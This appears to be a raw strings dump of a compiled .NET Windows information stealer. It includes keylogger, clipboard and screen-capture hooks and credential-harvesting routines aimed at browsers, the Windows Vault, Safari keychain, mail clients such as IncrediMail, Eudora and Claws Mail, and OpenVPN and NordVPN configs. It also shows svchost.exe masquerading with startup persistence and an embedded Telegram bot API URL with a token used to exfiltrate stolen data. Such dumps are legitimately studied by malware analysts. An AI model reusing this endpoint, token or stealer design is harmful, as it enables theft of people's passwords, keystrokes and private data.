!This program cannot be run in DOS mode.
`.rsrc
@.reloc
com.apple.Safari
Unable to resolve HTTP prox
1SPS*
KDBM(0
v4.0.30319
#Strings
2 U h r z
(!K!c!
#1#=#H#X#
5!C!)#
H8Nt4rUB20
hoSJG2yk20
pNByYT4xA40
U72a60
eMtvsp90
vN3bE0
ppwlgZFmL0
GhmSqP0
vXMfxQwbQ0
OKV9dxY0
0iQxd0
3oS8m0
lSatpNZer0
rMnruW0Ts0
hJ2QXJaUBy0
$$method0x6000100-1
$$method0x6000120-1
$$method0x6000140-1
$$method0x6000121-1
$$method0x6000192-1
$$method0x6000106-1
$$method0x6000116-1
$$method0x6000276-1
$$method0x600011b-1
$$method0x600008d-1
$$method0x600007e-1
ctqdT61
aB4Bl61
HMACSHA1
kj6aeoOD1
VT_UI1
samz26kL1
zvPOjnDN1
dZ1lamqztP1
KqzzR0piS1
IEnumerable`1
ICollection`1
IEnumerator`1
IList`1
YHsdjEb1
CS$<>9__CachedAnonymousMethodDelegate1
6Rj6zg1
get_Item1
6kAkHNKRQt1
$$method0x6000100-2
$$method0x6000116-2
$$method0x6000276-2
72dfb6c3-9363-4363-ad47-c0847074f102
HMACSHA512
Advapi32
kernel32
Microsoft.Win32
user32
ToUInt32
ReadInt32
ToInt32
VT_UI2
KeyValuePair`2
Dictionary`2
get_Item2
vJtdp8gts2
PAyEu2
WIrn7bVIFu2
gKtiJH2UXu2
KtV4bYMQnu2
ZTXOE273
AHqG5Vp73
D9RqHdY7V3
gwaTD8rX3
DDUFBcyX3
Tuple`3
LN4QhqZd3
get_Item3
UZoxHko3
F9Dgwx3
ToUInt64
ReadInt64
ToInt64
VT_UI4
ojE4S1O4
aMkuSLUOe4
ZcnfS75g4
fc5JgjMh4
a4DBBu4
8Tk5Xsv4
YIhTbfzCIz4
VAjVZOEJ5
Ed53W4QL5
93PHP5
UOtqe7GUjV5
x9fqS7W4w5
IS_TEXT_UNICODE_ASCII16
IS_TEXT_UNICODE_REVERSE_ASCII16
ToUInt16
ReadInt16
ToInt16
HMACSHA256
8jGZ721076
9bW5aZN6
Eu3RWUg1W6
nyYYew6
hk2PQTY4mx6
bntpfDl9d37
GzE7TpC8657
i1mi57
lwQTlpYTB7
zzICo5mP3F7
VaultGetItem_WIN7
Wk8NMqHa3U7
vv37dZ7
q8ama7
iqCyyB8
get_UTF8
VT_UI8
VaultGetItem_WIN8
e7sLO8
USQGbgN0U8
4Io5Nnb8
bB5RDWxxBh8
6lLZp8
N1emib69
zYB8OpI9789
KnAmdTWtM9
gGBqGKUoYh9
8IB1Kep9
zZWQtQp0Iz9
<Module>
QfCZy7A
K1m1EEpwA
14Piuf81B
z7zt4Lz4B
HZYspb6B
61PXPbCB
BCRYPT_KEY_DATA_BLOB
VT_BLOB
exB5RB
7KN1FZB
BUCpwwaB
PpMWTVjB
eg1AVRTvB
bDQevB
EmhlBC
fCrgvEADC
BCRYPT_KEY_DATA_BLOB_MAGIC
V85dqNYGKC
ZbGzLC
VBSaVt0YC
6uhBFYC
9Zi7dC
1vKjFekC
OIua9nDD2pC
F9MCrZ4D
kQouA5D
BWckXwRlK7D
hTv1j7yDD
LLKHF_EXTENDED
LLKHF_INJECTED
PrZfh4pQGD
AFClx6KHD
VT_CLSID
get_ID
set_ID
FileHandleID
fileHandleID
lpdwProcessID
processID
get_FormatID
set_FormatID
afzQOjWbD
gdfifD
Rr1378mAsD
awjBLJwD
DUPLICATE_CLOSE_SOURCE
1XRqPfmNqCE
BCRYPT_CHAINING_MODE
VT_STORAGE
v9uJDkRJE
INVALID_HANDLE
VT_FILETIME
IS_TEXT_UNICODE_SIGNATURE
IS_TEXT_UNICODE_REVERSE_SIGNATURE
VT_DATE
IS_TEXT_UNICODE_DBCS_LEADBYTE
AkN02NUE
AdcfibSCcE
1seQK45YqE
TARkKsE
Zl1pjqV0S3F
LpWWqV27F
5g7oDJBj0WF
tz1UWF
IO2pcF
rhC95SZykF
qkFLjak4G
49XpY5G
BCRYPT_AUTH_MODE_CHAIN_CALLS_FLAG
ZebhQdkICG
5mw66DKHG
oEPtAoLXG
esqIcPaNIbG
lMN0gG
bde4YUoG
bAhBRjcLwG
MXoGv7H
STATUS_AUTH_TAG_MISMATCH
STATUS_INFO_LENGTH_MISMATCH
kX7aszWmGH
IS_TEXT_UNICODE_ODD_LENGTH
BCRYPT_AUTH_TAG_LENGTH
BCRYPT_OBJECT_LENGTH
iKIQoY5sH
HFkZ0KwsH
9MsZzYSovH
VtjuG0v6I
get_ASCII
b4cgyMdSI
1s9hYPfwZI
ooGGdI
xWlElI
yG9Vd4ZpI
G3clpPvI
BNUHq4IfwI
gbDY1h7J
EBbw6nws9J
WVbttE7RrAJ
Ys5g8w1ZXJ
og19z5BZJ
hoO9XCtSPpJ
j0umqJ
Jz2s5bxJ
Bbe7dPK
IS_TEXT_UNICODE_UNICODE_MASK
IS_TEXT_UNICODE_NOT_UNICODE_MASK
IS_TEXT_UNICODE_REVERSE_MASK
IS_TEXT_UNICODE_NOT_ASCII_MASK
5wNeSK
u3CEBaK
ZVyC2LIjfK
U2KacUSqK
HqdwTPgvK
24UKehGqT0L
WvSYInWn3L
VT_DECIMAL
Lq87GrEL
VT_NULL
WH_KEYBOARD_LL
VT_BOOL
bhCbPkvT9eL
MGbAMkL
6z73IlCUXnL
NwchUDOtYyL
cMAi3M
bOJqASaoN5M
VT_VERSIONED_STREAM
VT_STREAM
BCRYPT_CHAIN_MODE_GCM
0S374TXEEM
BCRYPT_AES_ALGORITHM
kwRdQsTJM
hNeXGMJrpNM
eYz7fxrXLcM
DfTzb3N
93Q55FEN
qlduGt3fvGN
BCRYPT_INIT_AUTH_MODE_INFO_VERSION
HC_ACTION
c05ECpMXRN
LLKHF_ALTDOWN
WM_SYSKEYDOWN
WM_KEYDOWN
xrOHb7dN
lhkVsDO
rZ5vOdv3EO
System.IO
ZXyaCYcO
TjvjgbnO
8Ks7Mf58doO
zlUd4P
PPgknTNjr5P
koIyAQh6P
qN1tfyOBDP
BCRYPT_PAD_OAEP
zLxSEP
WM_SYSKEYUP
WM_KEYUP
LLKHF_UP
CekaXlZP
Jn6IrNHmfP
uCe20LK9rP
YPyIZHC62Q
sLfIIUm4Q
IEl85Q
eG7EuYDQ
Btl3MwISgQ
alpDsQ
3iLkQF2vuQ
v3nB63fPiyQ
pL2JyyQ
Ti8qBR
pu5FGXDR
MS_PRIMITIVE_PROVIDER
VT_ERROR
VT_VECTOR
4PMqRR
VT_BSTR
VT_LPSTR
VT_LPWSTR
vqLxMYTR
5yjizCbR
CMek3hR
W7CGtkR
z8D6GJscrR
Ki2TCeQ5S
IS_TEXT_UNICODE_STATISTICS
IS_TEXT_UNICODE_REVERSE_STATISTICS
trgqiBgRGES
IS_TEXT_UNICODE_NULL_BYTES
DWqlETZHS
IS_TEXT_UNICODE_CONTROLS
IS_TEXT_UNICODE_REVERSE_CONTROLS
IS_TEXT_UNICODE_ILLEGAL_CHARS
DUPLICATE_SAME_ACCESS
ERROR_SUCCESS
STATUS_SUCCESS
BCRYPT_PAD_PSS
6RN8taS
9d6w7MUxPlS
dKDP66XkBtS
pQZ7uS
m2dDLX3q5T
xbym7T
xpPy9T
oUQknAT
W21AT3TDT
dIw0jvET
AICB0gFT
VT_UINT
VT_INT
ZgHkZwXT
NacTpSr5eT
mzkmNhT
YjWTkCEelT
qrqkAYnNxT
jbC5ADU
4QqT6R82MU
BUROcGEnKMU
IOVxYU
L1gRcU
qYNigU
iuynlU
Vv2aGD2wnU
OsCczLlSHoU
4Rkt6V
LQJ1bH7V
get_IV
set_IV
WRhxUV
Ks9Z2WV
iPv78KdaV
pvFyqV
LPZqosV
fAWdSG9W
G10iLTeMJW
ZxmLyCOW
STATUS_BUFFER_OVERFLOW
nOdAWTPRW
NmKLQqaW
dG991X
RN1QGX
y43JNBHBJX
kmV3EJX
YWD21PX
tgeYJUX
OkjVU3QbgX
0wDsAjX
kJdI5inX
1NmRsX
EM4SwX
nQrbZHKlwX
Rcw4dWxxX
BZgslj9F4Y
VT_ARRAY
VT_EMPTY
LyLvUY
DzRkdqqJqWY
Yp4lnY
wtH4AGRQYyY
SQi20B5sNzY
5D0WVf0Z
EPmpKJZ
yqqOn5KZ
w7nVOZ
eh0kKOUZ
27kQBRYZ
FtpbcgjZ
value__
wHLKqmYsj6a
D4fjDUSMqAa
jl5ImicIFa
vpFUlRr4ULa
d9SDsQa
Hk5qk7QuQa
bzvnbG2ZXa
MZhLhfa
bWfZw1cja
25EIGpa
get_Data
set_Data
cbData
ProtectedData
cbAuthData
pbAuthData
PropertyData
SetQuota
whb0knxa
UbkCG1b
NjDT2b
BWwSVknNb
OtztxhkuqNb
BgIt3VYb
PublicIpAddressGrab
7UxTx0cb
5GcbTib
mscorlib
MMSksb
BAcBlWUDyb
wEBlCc
b85rWEc
IHk7YTZg4Hc
xAO6Kc
d4N7ZINc
WAF94IvQTUc
System.Collections.Generic
Microsoft.VisualBasic
WndProc
HookProc
FromFileTimeUtc
SK3MH8HQuc
get_Id
SchemaId
schemaId
pszAlgId
HookId
GetWindowThreadProcessId
processId
ChatId
SchemaElementId
9mMOitkFJd
DRhxgRcFaYd
PageExecuteRead
OpenRead
FileMapRead
VirtualMemoryRead
CreateThread
Ua5sfVjad
NClRs1dd
lpcbNeeded
DomainExtended
SHA1Managed
RijndaelManaged
add_Changed
remove_Changed
get_LastModified
set_LastModified
_lastModified
Interlocked
set_Enabled
get_IsEnabled
set_IsEnabled
_enabled
Undefined
lpOverlapped
samDesired
add_Elapsed
get_LastAccessed
set_LastAccessed
_lastAccessed
get_Reserved
reserved
System.Collections.Specialized
TorPid
activeWindowPid
pPackageSid
row_id
get_IsInvalid
get_Guid
vaultGuid
PcHwid
<ID>k__BackingField
<FormatID>k__BackingField
<Data>k__BackingField
<LastModified>k__BackingField
<IsEnabled>k__BackingField
<LastAccessed>k__BackingField
<Password>k__BackingField
<password>k__BackingField
<PropertyStorage>k__BackingField
<Name>k__BackingField
<FileName>k__BackingField
<ApplicationName>k__BackingField
<name>k__BackingField
<Username>k__BackingField
<username>k__BackingField
<Type>k__BackingField
<type>k__BackingField
<secure>k__BackingField
<expirationDate>k__BackingField
<sameSite>k__BackingField
<TypedPropertyValue>k__BackingField
<value>k__BackingField
<Size>k__BackingField
<IsRunning>k__BackingField
<Path>k__BackingField
<path>k__BackingField
<hostmask>k__BackingField
<domain>k__BackingField
<Version>k__BackingField
<Application>k__BackingField
<Description>k__BackingField
<user>k__BackingField
<hoster>k__BackingField
<Tasks>k__BackingField
<objects>k__BackingField
<Accounts>k__BackingField
<Keys>k__BackingField
<Lenght>k__BackingField
<JsonResult>k__BackingField
<Host>k__BackingField
<GuidMasterKey>k__BackingField
<httpOnly>k__BackingField
GetField
TrimEnd
ReadToEnd
AppEnd
Append
get_Millisecond
GetUpperBound
GetLowerBound
set_Method
method
Clipboard
get_Password
set_Password
DomainPassword
get_password
set_password
XupUyd
ulCFz2iG6e
CfvLTe
t6fc30xVe
GrEDYWe
rw8agunzWe
pOxbRQkI0ce
Replace
IsNullOrWhiteSpace
DeleteBackspace
QueryDosDevice
hInstance
IdentityReference
Sequence
cbNonce
pbNonce
Resource
vkCode
wScanCode
scanCode
keyCode
set_Mode
FileMode
ShareMode
PaddingMode
CryptoStreamMode
CipherMode
SelectSingleNode
XmlNode
get_Unicode
get_BigEndianUnicode
IsTextUnicode
Ma5Mi6Pee
pfhTNalfe
FromImage
SectionImage
get_PropertyStorage
set_PropertyStorage
SerializedPropertyStorage
SendMessage
BRhuffge
AddRange
CompareExchange
CredentialCache
SectionNoCache
EndInvoke
BeginInvoke
GetEnvironmentVariable
SetEnvironmentVariable
IEnumerable
IDisposable
ToDouble
get_Handle
RuntimeFieldHandle
hSourceHandle
SafeHandle
GetModuleHandle
RuntimeTypeHandle
ReleaseHandle
CloseHandle
DuplicateHandle
CreateHandle
GetTypeFromHandle
hSourceProcessHandle
hTargetProcessHandle
lpTargetHandle
bInheritHandle
vaultHandle
activeWindowHandle
handle
Rectangle
ToSingle
CreateFile
hTemplateFile
DeleteFile
WriteFile
MoveFile
MapViewOfFile
UnmapViewOfFile
lastTitle
activeWindowTitle
lphModule
get_MainModule
ProcessModule
get_Name
set_Name
lpDeviceName
get_FileName
set_FileName
GetModuleFileName
lpExistingFileName
lpFileName
GetFileName
lpNewFileName
_fileName
get_ModuleName
lpModuleName
lpBaseName
baseName
lpValueName
StartupRegName
rootPathName
get_OSFullName
get_FullName
OperatingSystemName
get_ApplicationName
set_ApplicationName
StartupInstallationName
lpName
lpAppName
get_UserName
get_ComputerName
ThisComputerName
ProcessorName
get_ProcessName
processName
StartupEnvName
GetProcessesByName
lpKeyName
pszCredentialFriendlyName
StartupDirectoryName
GetDirectoryName
astable_name
item_name
get_name
set_name
Filename
filename
get_Username
set_Username
get_username
set_username
DateTime
GetLastAccessTime
dwTime
3Tnz9MQanme
AppendLine
get_NewLine
Combine
LocalMachine
Escape
Unescape
vp1E4Nkhpe
DataProtectionScope
get_Type
set_Type
pszBlobType
GetFileType
MimeType
ValueType
LogType
SecurityProtocolType
GetType
set_ContentType
item_type
get_type
set_type
FileShare
Compare
System.Core
get_secure
set_secure
PtrToStructure
get_InvariantCulture
Capture
NameObjectCollectionBase
HttpWebResponse
GetResponse
Dispose
Reverse
get_expirationDate
set_expirationDate
X509Certificate
GenericCertificate
DomainCertificate
Create
KBDLLHookProcDelegate
MulticastDelegate
Terminate
PcState
GetKeyboardState
lpKeyState
GetKeyState
Delete
get_sameSite
set_sameSite
PageReadWrite
PageExecuteReadWrite
nNumberOfBytesToWrite
FileMapWrite
VirtualMemoryWrite
Remote
STAThreadAttribute
CompilerGeneratedAttribute
GuidAttribute
SecuritySafeCriticalAttribute
ExtensionAttribute
AssemblyFileVersionAttribute
FlagsAttribute
CompilationRelaxationsAttribute
ReliabilityContractAttribute
ParamArrayAttribute
RuntimeCompatibilityAttribute
SuppressUnmanagedCodeSecurityAttribute
set_UseShellExecute
FileMapExecute
ReadByte
ToByte
get_Value
HandleValue
TryGetValue
get_TypedPropertyValue
set_TypedPropertyValue
GetPropertyValue
get_value
set_value
set_KeepAlive
Remove
SectionReserve
HeZVnlye
get_Size
set_Size
dataSize
cbSize
get_StorageSize
lpFileSize
get_NameSize
volumeNameSize
nFileSystemNameSize
SQLDataTypeSize
get_StoreSize
get_ValueSize
get_HashSize
set_BlockSize
chunkSize
get_KeySize
Serialize
Deserialize
Initialize
Finalize
Synchronize
page_size
Resize
eaQ9Uy0f
xRYQcxBJJKf
iu8gdLf
KlvjQJWPMf
SizeOf
get_ItemOf
LastIndexOf
TvqHM8WPf
cchBuff
avdnBDAQkf
nvdSA1gFwkf
lastInputInf
lWNraPl6g
LveLfuXCg
C1je6nFg
xkcrLzS2Pag
7kbNX4fag
get_Jpeg
MCTbVg0Vlg
System.Threading
get_Padding
set_Padding
UTF8Encoding
encoding
System.Drawing.Imaging
get_IsRunning
set_IsRunning
CreateFileMapping
FromBase64String
ToBase64String
EscapeDataString
UnescapeDataString
lpReturnedString
GetPrivateProfileString
ToString
GetString
OctetString
BitString
Substring
System.Drawing
get_Msg
RoITnzwg
BQSCs5tqD2h
tbOi2Ch
vR5rnkJECh
CDmd8VVuIh
usXcmKh
V4iY3OORh
ijlPwM7rUh
tq9jYh
dwMaximumSizeHigh
dwFileOffsetHigh
5A16eK2jh
xo3flh
Q7CDvowdeph
ComputeHash
get_Path
set_Path
SystemAppdataPath
get_ExecutablePath
AsmFilePath
AppStartupFullPath
GetTempPath
GetFolderPath
lpTargetPath
StartupDirectoryPath
get_path
set_path
get_Width
get_Length
MaximumLength
dwMinLength
SystemInformationLength
ObjectInformationLength
set_MaxJsonLength
ReturnLength
maximumComponentLength
GetWindowTextLength
dwMaxLength
EndsWith
StartsWith
UXVBosubHxh
bCgVxh
4SzrpeXw4Bi
eTZPDjGi
jjV4Pi
Wj6e01AZi
ZuiyObZi
HMrAci
PtrToStringUni
StringToHGlobalUni
TelegramApi
7sOWvi
7r8Hd0xi
y83zfLzi
zzMRi50ZbIj
yXaueKj
ssRzwaj
J2oAxXZ8hej
objrij
yqka4Dnj
4fG1pW7nrj
iPBhTh4k
GsZdoM3Kk
KZP3oPTk
AsyncCallback
RemoteCertificateValidationCallback
get_ServerCertificateValidationCallback
set_ServerCertificateValidationCallback
callback
get_CapsLock
TransformFinalBlock
TransformBlock
4XFfXtLNik
sDW8VJXmk
FfM63nk
idHook
_clipboardHook
_keyboardHook
h8UhXrk
get_hostmask
set_hostmask
JBIfopUuk
WDAbvAl
pC93TKl
yErh6Ml
AllocHGlobal
FreeHGlobal
Illegal
Marshal
Decimal
System.Security.Principal
set_Interval
ScreenInterval
KeyloggerInterval
Rijndael
cbLabel
pbLabel
System.ComponentModel
EnableTorPanel
DZ1ROuugl
Kernel32.dll
kernel32.dll
User32.dll
user32.dll
vaultcli.dll
psapi.dll
ntdll.dll
bcrypt.dll
System.Xml
set_SecurityProtocol
Control
gcm5441m
AqmQAm
ncPmI6JFm
lV67BHm
TdBoIm
z1WZRsRVcam
FileStream
get_BaseStream
GetResponseStream
CryptoStream
GetRequestStream
MemoryStream
get_LParam
get_WParam
get_Param
lParam
wParam
get_Item
set_Item
VaultGetItem
vaultItem
OperatingSystem
HmacAlgorithm
SymmetricAlgorithm
phAlgorithm
KeyedHashAlgorithm
algorithm
5g32Kmm
Random
ICryptoTransform
kutXGum
Maximum
root_num
9amX8zrQ0n
jlaAaY4n
EeAnbIjWSn
pXb93gsWTn
zBBnhFPUn
NsszVgFNFZn
ToBoolean
IsLittleEndian
PsDAcn
CopyFromScreen
get_PrimaryScreen
lpNumberOfBytesWritten
X509Chain
ChangeClipboardChain
get_domain
set_domain
QhGKJuk8jn
WZiCdIVBomn
Extension
get_OSVersion
get_Version
set_Version
dwInfoVersion
get_Application
set_Application
get_Location
ObjectDataInformation
SystemRegistryQuotaInformation
SystemBasicInformation
ObjectBasicInformation
QueryLimitedInformation
SystemPerformanceInformation
SystemProcessorPerformanceInformation
SystemLookasideInformation
SystemHandleInformation
ObjectNameInformation
GetVolumeInformation
ObjectTypeInformation
ObjectAllInformation
NtQuerySystemInformation
SystemExceptionInformation
SystemProcessInformation
ObjectInformation
SetInformation
SystemInterruptInformation
SystemTimeOfDayInformation
QueryInformation
VirtualMemoryOperation
pszImplementation
System.Globalization
System.Web.Script.Serialization
System.Reflection
PropertyDataCollection
NameValueCollection
MatchCollection
GroupCollection
KeysCollection
ManagementObjectCollection
KeyCollection
set_Position
CreationDisposition
SearchOption
Win32Exception
CryptographicException
ArgumentOutOfRangeException
ArgumentException
get_Description
set_Description
get_StatusDescription
_description
System.Runtime.ConstrainedExecution
StringComparison
add_KeyDown
remove_KeyDown
get_CtrlKeyDown
get_ShiftKeyDown
get_AltKeyDown
Unknown
pNWiPh3o
TInwLo
CompareTo
CopyTo
2CcnshR9cXo
lastInPutNfo
dwExtraInfo
ImageCodecInfo
FieldInfo
FileInfo
CultureInfo
pPaddingInfo
FileSystemInfo
MemberInfo
ComputerInfo
get_StartInfo
ProcessStartInfo
GetLastInputInfo
DirectoryInfo
roDERnWjo
slMT52ko
Rm2Soo
yYxwZuo
Zc94s3p
fxyjVpjZP5p
vDSpd77GKp
4U4DMp
6uJSuyOdNp
2pkrSp
add_KeyUp
remove_KeyUp
51JJwYp
dwNumberOfBytesToMap
Bitmap
ENi5lp
FwV0vLJmp
TimeStamp
LocalApp
1ayUFkTHpp
AppAddStartup
HideFileStartup
Q8jCQdbwp
Jw6jnaYzp
XIagFK3q
K201gjCq
U9CiEwn1cOq
0bxjeq
System.Linq
LnQ7uq
ejEQJNr
ToChar
lpChar
DirectorySeparatorChar
ObjectTypeNumber
volumeSerialNumber
StreamReader
TextReader
BinaryReader
SHA1CryptoServiceProvider
MD5CryptoServiceProvider
RNGCryptoServiceProvider
TripleDESCryptoServiceProvider
BCryptCloseAlgorithmProvider
BCryptOpenAlgorithmProvider
IFormatProvider
StringBuilder
SpecialFolder
sender
Encoder
volumeNameBuffer
fileSystemNameBuffer
buffer
ServicePointManager
Integer
EnableClipboardLogger
EnableScreenLogger
_screenLogger
_keyLogger
EnableKeylogger
ManagementObjectSearcher
ObjectIdentifier
SecurityIdentifier
ElapsedEventHandler
LogTimer
ToUpper
CurrentUser
get_user
set_user
EncoderParameter
Object_Pointer
BitConverter
get_hoster
set_hoster
BinaryFormatter
SetClipboardViewer
ToLower
JavaScriptSerializer
get_Major
get_Minor
GetLastWin32Error
GetLastError
Authenticator
IEnumerator
ManagementObjectEnumerator
GetEnumerator
RandomNumberGenerator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
WAmm02rr
passwordVaultPtr
ReadIntPtr
sIxy49Ds
tc0CNNrkHs
b9HNMs
AtKbHFaCTs
lesoAKGUs
hJI6RN3PUs
427n9Ys
SA8bYs
Graphics
System.Diagnostics
get_Bounds
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
GetInstances
get_ChildNodes
Matches
EnableCookies
GetDirectories
master_table_entries
get_Properties
ExpandEnvironmentVariables
GetFiles
EnumProcessModules
NumberStyles
GetSubKeyNames
field_names
ReadAllLines
GetProcesses
System.Security.Cryptography.X509Certificates
FlagsAndAttributes
lpFileMappingAttributes
SecurityAttributes
FileBytes
Rfc2898DeriveBytes
ReadAllBytes
BufferBytes
GetBytes
db_bytes
get_Values
GetLogicalDrives
fileSystemFlags
dwFlags
ElapsedEventArgs
get_Ticks
get_Tasks
set_Tasks
ICredentials
set_Credentials
get_DefaultCredentials
Equals
CreateParams
VaultEnumerateItems
System.Windows.Forms
Contains
System.Web.Extensions
System.Text.RegularExpressions
iterations
System.Collections
set_MaximumAutomaticRedirections
StringSplitOptions
RegexOptions
options
get_Groups
get_Chars
GetImageEncoders
System.Timers
RuntimeHelpers
EncoderParameters
SslPolicyErrors
SystemInformationClass
ObjectInformationClass
ManagementClass
dwDesiredAccess
GrantedAccess
FileAccess
FileMapAllAccess
processAccess
get_Success
CreateProcess
hProcess
OpenProcess
GetCurrentProcess
lpBaseAddress
PublicIpAddress
get_objects
set_objects
VaultEnumerateVaults
pPropertyElements
set_Arguments
get_Accounts
set_Accounts
get_Exists
get_Keys
set_Keys
get_ModifierKeys
L3jIgzL3t
Fws6pNct7t
PHM5At
vJq2mjVGEt
5BSoMBiEt
WkhmjDHt
7sVgIt
Concat
AppendFormat
ImageFormat
Subtract
VT_BLOB_Object
VT_STREAMED_Object
VT_STORED_Object
ManagementBaseObject
hFileMappingObject
hObject
ManagementObject
cbKeyObject
pbKeyObject
NtQueryObject
object
Collect
set_AllowAutoRedirect
flProtect
Unprotect
System.Net
mYyxr2KUoet
offset
get_Height
get_Lenght
set_Lenght
op_Explicit
SectionCommit
WaitForExit
cbSalt
VaultOpenVault
get_Default
lpDefault
pcbResult
IAsyncResult
CookieResult
phkResult
get_JsonResult
set_JsonResult
result
UnsignedInt
set_UserAgent
PublicUserAgent
System.Management
pResourceElement
XmlElement
pAuthenticatorElement
pIdentityElement
dwIncrement
sql_statement
Environment
XmlDocument
get_Parent
GetParent
get_Current
content
get_Count
get_HandleCount
get_TickCount
vaultItemCount
set_IterationCount
dwPropertiesCount
vaultCount
BCryptDecrypt
BCryptEncrypt
TrimStart
AppStart
Convert
UnsignedShort
HttpWebRequest
XmlNodeList
ToList
MozillaBrowserList
ChromiumBrowserList
get_Host
set_Host
set_Timeout
GetKeyboardLayout
dwLayout
cbInput
pbInput
cbOutput
pbOutput
get_StandardOutput
set_RedirectStandardOutput
MoveNext
System.Text
LastCopiedText
KeylogText
ReadAllText
AppendAllText
get_InnerText
GetText
GetWindowText
Log_text
cbMacContext
pbMacContext
sDibhgX3u
WXT2Toniu
75huxvu
D9IL6f99v
wCr8nv
GMs7W0h7w
RpMdOh6Aw
sBMpxPw
RZphkGJgWw
sjJDxTMALaw
K6SDbw
x99VWTVCHdw
bTpbBIfw
2EvH0I9oolw
dwMaximumSizeLow
dwFileOffsetLow
get_Now
GetForegroundWindow
NativeWindow
set_CreateNoWindow
LGrmjCDHYyw
Mg1C2Bzw
itNvg4VQ6x
vnEgkPdBx
ToUnicodeEx
GetModuleFileNameEx
RegQueryValueEx
GetFileSizeEx
UnhookWindowsHookEx
SetWindowsHookEx
CallNextHookEx
MaximumEx
RegOpenKeyEx
XzxQ0Lx
nx36bPx
mvY30b6Sx
ucchMax
6SkRkcx
2xlt72zcx
BufferEndIndex
BlockIndex
BufferStartIndex
s4c1XDG9ix
omSE8Qlx
pAxlatx
eqnnFCGXUvx
WIs21y
sQJeDY1v3y
CKCOgaE7Dy
FAOwoEy
aRuqPy
Iw9q0Qy
ProtectedArray
ToByteArray
InitializeArray
ToArray
ToCharArray
Consistency
get_Key
set_Key
OpenSubKey
subKey
RegCloseKey
get_GuidMasterKey
set_GuidMasterKey
_guidMasterKey
ContainsKey
wVirtKey
hImportKey
BCryptImportKey
BCryptDestroyKey
RegistryKey
_wsftpkey
K45z4gy
KUt6tachy
System.Security.Cryptography
oIb4mGsDly
GetExecutingAssembly
get_httpOnly
set_httpOnly
PageReadonly
Multiply
PageWriteCopy
BlockCopy
FileMapCopy
System.Runtime.Serialization.Formatters.Binary
AmountOfMemory
get_TotalPhysicalMemory
Directory
Registry
get_Capacity
Quality
op_Equality
op_Inequality
System.Security
System.Net.Security
Identity
IsNullOrEmpty
BCryptSetAlgorithmProperty
BCryptGetProperty
BCryptSetProperty
pszProperty
jcKalNV6z
kzd7d7z
I94RSxpJt9z
ewq4UEX7wAz
ezcujpCz
S2yj7dhXDz
tW5v7cNe0Qz
HCXrjFu3cz
4bGqjdvz
$5681f181-ff4c-461f-9a51-7ba26b55e37d
WrapNonExceptionThrows
1.0.0.0
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
p p p!p"p#p$p%p&p'p(p)p*p+p,p-p.p/p0p1p2p3p4p5p6p7p8p9p:p;p<p=p>p?p@pApDpEpFpGpHpKpiy
k#n+n9
4 5 6!7"8#9$:%;&<'=(>)?*@+A,B-C0D4E5F6G7H8I9K:N;O=QATDZF[N`PfTxZy^z`{c|g}j
BACAIHJHQPVUWUXUZY_^fehgigjgkglgmgpo
image/jpeg
/log.tmp
text/html
yyyy-MM-dd HH:mm:ss
text/plain
<br>User Name:
<br>RAM:
<br>CPU:
Time:
MM/dd/yyyy HH:mm:ss
<br>Computer Name:
IP Address:
<br>OSFullName:
OSFullName:
User Name:
Recovered!
Time:
https://api.ipify.org
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
https://api.telegram.org/bot6663697988:AAHBsfmbPr_JinYR7jDRpZloxUBi6EcQ6HE/
1755939698
appdata
svchost.exe
svchost.exe.exe
]</b> (
{ALT+F4}
{PageDown}
{KEYLEFT}
{KEYRIGHT}
control
{NumLock}
{BACK}
{HOME}
{ALT+TAB}
{PageUp}
{KEYDOWN}
{ENTER}
{CTRL}
{KEYUP}
{CAPSLOCK}
{Insert}
"
<br><hr>Copied Text: <br>
logins
IE/Edge
2F1A6504-0641-44CF-8BB5-3612D865F2E5
Windows Secure Note
3CCD5499-87A8-4B10-A215-608888DD3B55
Windows Web Password Credential
154E23D0-C644-4E6F-8CE6-5069272F999F
Windows Credential Picker Protector
4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Web Credentials
77BC582B-F0A6-4E15-4E80-61736B6F3B29
Windows Credentials
E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
Windows Domain Certificate Credential
3E0E35BE-1B77-43E7-B873-AED901B6275B
Windows Domain Password Credential
3C886FF3-2669-4AA2-A8FB-3F6759A77548
Windows Extended Credential
00000000-0000-0000-0000-000000000000
SchemaId
pResourceElement
pIdentityElement
pPackageSid
pAuthenticatorElement
UC Browser
UCBrowser\
Login Data
journal
wow_logins
Safari for Windows
\Common Files\Apple\Apple Application Support\plutil.exe
\Apple Computer\Preferences\keychain.plist
<string>
</string>
<data>
</data>
<array>
<dict>
-convert xml1 -s -o "
\fixed_keychain.xml"
\Microsoft\Credentials\
\Microsoft\Protect\
credential
QQ Browser
\Default\EncryptedStorage
Tencent\QQBrowser\User Data
Profile
\EncryptedStorage
entries
category
Password
password_value
IncrediMail
PopPassword
SmtpPassword
Software\IncrediMail\Identities\
\Accounts_New
SmtpServer
EmailAddress
Eudora
Software\Qualcomm\Eudora\CommandLine\
current
Settings
SavePasswordText
ReturnAddress
Falkon Browser
\falkon\profiles\
startProfile=([A-z0-9\/\.\"]+)
profiles.ini
\browsedata.db
autofill
ClawsMail
\Claws-mail
\clawsrc
passkey0
master_passphrase_salt=(.+)
master_passphrase_pbkdf2_rounds=(.+)
\accountrc
smtp_server
address
account
\passwordstorerc
{(.*),(.*)}(.*)
Flock Browser
APPDATA
\Flock\Browser\
signons3.txt
DynDns
username=
password=
https://account.dyn.com/
ALLUSERSPROFILE
Dyn\Updater\config.dyndns
t6KzXhCh
Dyn\Updater\daemon.cfg
global
accounts
account.
username
password
Psi/Psi+
\accounts.xml
\Psi+\profiles
\Psi\profiles
OpenVPN
Software\OpenVPN-GUI\configs
Software\OpenVPN-GUI\configs\
auth-data
entropy
USERPROFILE
\OpenVPN\config\
remote
NordVPN
NordVpn.exe*
user.config
